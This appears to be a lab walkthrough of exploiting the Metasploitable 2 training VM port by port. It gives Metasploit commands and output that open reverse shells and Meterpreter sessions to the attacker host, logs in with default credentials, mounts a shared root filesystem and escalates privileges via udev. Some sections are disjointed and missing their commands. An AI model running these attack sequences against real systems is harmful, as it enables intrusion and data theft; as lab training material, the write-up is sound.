Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable?
Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be
used to conduct security training, test security tools, and practice common
penetration testing techniques.
In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154.
Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans.
Let’s start by port scanning the target with nmap. I did a full port, aggresive scan against the target. Here are the results.
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the
vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was
removed on July 3rd 2011.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/interact normal Unix Command, Interact with Established Connection
msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.127.154 yes The target address
RPORT 21 yes The target port
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.127.159:57936 -> 192.168.127.154:6200) at 2014-06-03 22:42:36 +0300
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Aaand we own the machine! Now let’s move on.
Port 22 ssh
The OpenSSL package installed on the system is vulnerable to a bruteforce exploit due to a random number generator weakness. Here’s the overview and the CVE number:
CVE-2008-0166
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable > numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
You can consult the source for more information, basically this checks if the root account has a weak SSH key, testing each key in the directory where you placed the keys. Upon a hit, you will see something like this:
msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options
Module options (auxiliary/scanner/telnet/telnet_version):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
RPORT 23 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the Telnet probe
USERNAME no The username to authenticate as
msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(telnet_version) > run
[*] 192.168.127.154:23 TELNET _ _ _ _ _ _ ____ \x0a _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a |_| \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
So now we know the credentials for the msfadmin account, and if you log in and play around you will find out that this accound has sudo privilege, so it’s possible to run commands as root.
Port 80 apache
Navigating to the root of the web server, we can see some vulnerable web applications, along with the msfadmin account details which we got earlier with telnet. I won’t go over the web applications here, because I am focusing on host based exploitation in this post. However, I found out that I could use Metasploit against one of them to get a shell, so I will detail that here.
The Nessus scan revealed that the TWiki web application is vulnerable to remote code execution. I found the following suitable exploit:
TWiki History TWikiUsers rev Parameter Command Execution
This module exploits a vulnerability in the history component of TWiki. By passing a ‘rev’ parameter containing shell metacharacters to the
TWikiUsers script, an attacker can execute arbitrary OS commands.
msf > use exploit/unix/webapp/twiki_history
msf exploit(twiki_history) > show options
Module options (exploit/unix/webapp/twiki_history):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
URI /twiki/bin yes TWiki bin directory path
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(twiki_history) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(twiki_history) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(twiki_history) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ZeiYbclsufvu4LGM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Successfully sent exploit request
[*] Reading from socket B
[*] B: "ZeiYbclsufvu4LGM\r\n"
[*] Matching...
[*] A is input...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo D0Yvs2n6TnTUDmPF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2014-06-08 17:31:48 +0300
[*] Reading from socket B
[*] B: "D0Yvs2n6TnTUDmPF\r\n"
[*] Matching...
[*] A is input...
whoami
www-data
This is a low privilege shell, but we can escalate to root via the udev exploit, as shown later.
Port 445 samba
First, I’ll use an auxiliary module to get the server’s version:
1234567891011121314151617181920
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(smb_version) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(smb_version) > run
[*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
With that information in hand, we can now use a suitable exploit against the target:
Samba “username map script” Command Execution
This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map
script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No
authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.127.154 yes The target address
RPORT 139 yes The target port
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo f8rjvIDZRdKBtu0F;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "f8rjvIDZRdKBtu0F\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:46653) at 2014-06-04 22:23:23 +0300
whoami
root
Port 514 tcpwrapped
The nmap scan revealed the port is open but it’s tcpwrapped. Let’s first see what that means:
TCP Wrapper is a host-based networking access control list system, used to filter network access to Internet Protocol servers on (Unix-
like) operating systems such as Linux or BSD. (Wikipedia)
So we can conclude the port is protected by TCP Wrapper. If we try to netcat to the port, we see this:
123
nc -vvn 192.168.127.154 514
(UNKNOWN) [192.168.127.154] 514 (shell) open
I ran a Nessus scan against the target, and according to the report, a critical vulnerability is present on this port:
It was possible to log on this machine without password.
Description
Using common usernames as well as the usernames reported by ‘finger’, Nessus was able to log in through rsh. Either the accounts are not protected by passwords or the ~/.rhosts files are not configured properly.
This vulnerability is confirmed to exist in Cisco Prime LAN Management Solution, but could be present on any host that is not securely configured.
Port
tcp/514
So all we have to do is log in via the remote shell program:
1234567891011121314151617181920212223
rsh 192.168.127.154
Last login: Wed May 7 11:00:37 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#
Port 1099 java-rmi
Let’s continue our exploitation. Anything labeled Java is bound to be interesting from a security perspective :)
Searching for Java exploits yielded something interesting:
Java RMI Server Insecure Default Configuration Java Code Execution
This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from
any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be
used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java
Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java
process. RMI method calls do not support or require any sort of authentication.
msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1099 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf exploit(java_rmi_server) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.127.154 yes The target address
RPORT 1099 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf exploit(java_rmi_server) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(java_rmi_server) > exploit
[*] Started reverse handler on 192.168.127.159:4444
[*] Using URL: http://0.0.0.0:8080/oVUJAkfU
[*] Local IP: http://192.168.127.159:8080/oVUJAkfU
[*] Connected and sending request for http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar
[*] 192.168.127.154 java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 192.168.127.154
[*] Meterpreter session 2 opened (192.168.127.159:4444 -> 192.168.127.154:36965) at 2014-06-04 22:42:17 +0300
[+] Target 192.168.127.154:1099 may be exploitable...
[*] Server stopped.
meterpreter > getuid
Server username: root
meterpreter >
Port 1524 shell
Well, not much to say here. There’s already a nice, cozy shell waiting for connections, so nothing extra needs to be done.
Port 2049 nfs
Let’s use the the showmount command to see the NFS server’s export list. This command displays mount information for an NFS server. The -e flag is for showing exports:
12345
showmount -e 192.168.127.154
Export list for 192.168.127.154:
/ *
How nice! The root directory is shared. So, let’s mount it then:
123
mkdir /metafs # this will be the mount point
mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking
Now we can read the passwords and everything else:
The Nessus scan that I ran against the target revealed the following:
MySQL Unpassworded Account Check
Synopsis
The remote database server can be accessed without a password.
Description
It is possible to connect to the remote MySQL database server using an unpassworded account. This may allow an
attacker to launch further attacks against the database.
The ‘root’ account does not have a password.
Here is the list of databases on the remote server :
– information_schema
– dvwa
– metasploit
– mysql
– owasp10
– tikiwiki
– tikiwiki195
Let’s see if we can indeed connect to the database as root without a password:
123456789101112131415
mysql -u root -p -h 192.168.127.154
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Now we can look inside the databases and get any data that might interest us.
Port 3632 distccd
distccd is the server for the distcc distributed compiler. It accepts and runs compilation jobs for network clients. Metasploit has an exploit avaiable for this:
DistCC Daemon Command Execution
This module uses a documented security weakness to execute arbitrary commands on any system running distccd.
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(distcc_exec) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.127.154 yes The target address
RPORT 3632 yes The target port
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(distcc_exec) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo VhuwDGXAoBmUMNcg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "VhuwDGXAoBmUMNcg\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:52283) at 2014-06-05 21:34:46 +0300
whoami
daemon
udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.
Usage
Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].
The exploit will execute /tmp/run as root so throw whatever payload you want in there.
Ok, on the command line on the victim, I looked for netcat and fortunately, it’s installed:
Next, put some payload in /tmp/run, since that will be executed by the exploit. I will use netcat to connect to the atacker machine and give it a shell:
And on the victim machine, now that all is set up, I just make the exploit executable and run it:
12
chmod +x 8572
./8572 2767
Now check our local netcat listener for the root shell:
123
nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539]
whoami
root
A bit on effort on that one, but all the more rewarding! Let’s move on.
Port 5432 postgresql
Since I already saw earlier that the mysql database wasn’t password protected, I will try a bruteforce auxiliary module to see if I can get in this one.
PostgreSQL Login Utility
This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and
USERPASS_FILE options.
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > show options
Module options (auxiliary/scanner/postgres/postgres_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target address range or CIDR identifier
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME postgres no A specific username to authenticate as
USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_user.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(postgres_login) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(postgres_login) > run
[*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.127.154:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] 192.168.127.154:5432 Postgres - Disconnected
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
So it’s possible to log in to this database like earlier with mysql, but I searched through Metasploit’s available exploits, and I stumbled upon one that can further the exploitation:
PostgreSQL for Linux Payload Execution
On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries’s
om there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE
pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared
object’s constructor, it does not need to conform to specific Postgres API versions.
msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > show options
Module options (exploit/linux/postgres/postgres_payload):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD no The password for the specified username. Leave blank for a random password.
RHOST yes The target address
RPORT 5432 yes The target port
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose output
Exploit target:
Id Name
-- ----
0 Linux x86
msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(postgres_payload) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > exploit
[*] Started reverse handler on 192.168.127.159:4444
[*] 192.168.127.154:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 192.168.127.154
[*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2014-06-06 22:49:17 +0300
From here we again have to elevate our privileges. I will exploit the same vulnerability with the udev exploit, but this time from inside Metasploit:
meterpreter > background
[*] Backgrounding session 1...
msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink
msf exploit(udev_netlink) > show options
Module options (exploit/linux/local/udev_netlink):
Name Current Setting Required Description
---- --------------- -------- -----------
NetlinkPID no Usually udevd pid-1. Meterpreter sessions will autodetect
SESSION yes The session to run this module on.
WritableDir /tmp yes A directory where we can write files (must not be mounted noexec)
Exploit target:
Id Name
-- ----
0 Linux x86
msf exploit(udev_netlink) > set SESSION 1
SESSION => 1
msf exploit(udev_netlink) > exploit
[*] Started reverse handler on 192.168.127.159:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2770
[+] Found netlink pid: 2769
[*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb
[*] Writing exploit executable (1879 bytes) to /tmp/DQDnKUFLzR
[*] chmod'ing and running it...
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2014-06-06 23:03:13 +0300
whoami
root
So, the same exploit that I manually used earlier was very easy and quick in Metasploit. Onwards!
Port 5900 vnc
The Nessus scan reported that the server is using the password ‘password’. So I will use vncviewer to connect to it:
1234567891011121314
vncviewer 192.168.127.154
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
And we have another root shell.
Port 6667 irc
An exploit is available for this:
UnrealIRCD 3.2.8.1 Backdoor Command Execution
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz
archive between November 2009 and June 12th 2010.
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 6667 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.127.154:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qcHh6jsH8rZghWdi;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "qcHh6jsH8rZghWdi\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (192.168.127.159:4444 -> 192.168.127.154:41975) at 2014-06-06 23:31:44 +0300
whoami
root
Port 8180 tomcat
First, let’s see what information we can get using the Tomcat Administration Tool Default Access module:
12345678910111213141516171819202122
msf > use auxiliary/admin/http/tomcat_administration
msf auxiliary(tomcat_administration) > show options
Module options (auxiliary/admin/http/tomcat_administration):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8180 yes The target port
THREADS 1 yes The number of concurrent threads
TOMCAT_PASS no The password for the specified username
TOMCAT_USER no The username to authenticate as
VHOST no HTTP server virtual host
msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154
RHOSTS => 192.168.127.154
msf auxiliary(tomcat_administration) > run
[*] http://192.168.127.154:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
With credentials in hand, now we can use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit:
This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive
containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in > this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows
payloads.
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse handler on 192.168.127.159:8888
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war ...
[*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp...
[*] Undeploying RuoE02Uo7DeSsaVp7nmb79cq ...
[*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2014-06-06 23:51:01 +0300
whoami
tomcat55
We can elevate our privileges using the udev exploit from earlier, so I won’t go over it again.
Port 8787 drb
First I wanted to know what this drb is, since I wasn’t familiar with it.
Distributed Ruby or DRb allows Ruby programs to communicate with each other on the same machine or over a network. DRb uses remote method
invocation (RMI) to pass commands and data between processes (Wikipedia)
Then I searched in Metasploit for an exploit, and luckily, I got a hit:
msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(drb_remote_codeexec) > show options
Module options (exploit/linux/misc/drb_remote_codeexec):
Name Current Setting Required Description
---- --------------- -------- -----------
URI yes The dRuby URI of the target host (druby://host:port)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787
URI => druby://192.168.127.154:8787
msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(drb_remote_codeexec) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(drb_remote_codeexec) > exploit
[*] Started reverse double handler
[*] trying to exploit instance_eval
[*] instance eval failed, trying to exploit syscall
[-] Exploit failed: Errno::EINVAL Invalid argument
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7Kx3j4QvoI7LOU5z;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "7Kx3j4QvoI7LOU5z\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:35889) at 2014-06-08 16:51:56 +0300
whoami
root
Another port, another shell!
This turned out to be a a very lengthy post. There were some ports I couldn’t find an exploit for, so can’t determine if the underlying services were exploitable or not. Overall, owning Metasploitable in multiple ways and documenting it was the goal of this post.
Today’s cookie:
You will be a winner today. Pick a fight with a four-year-old.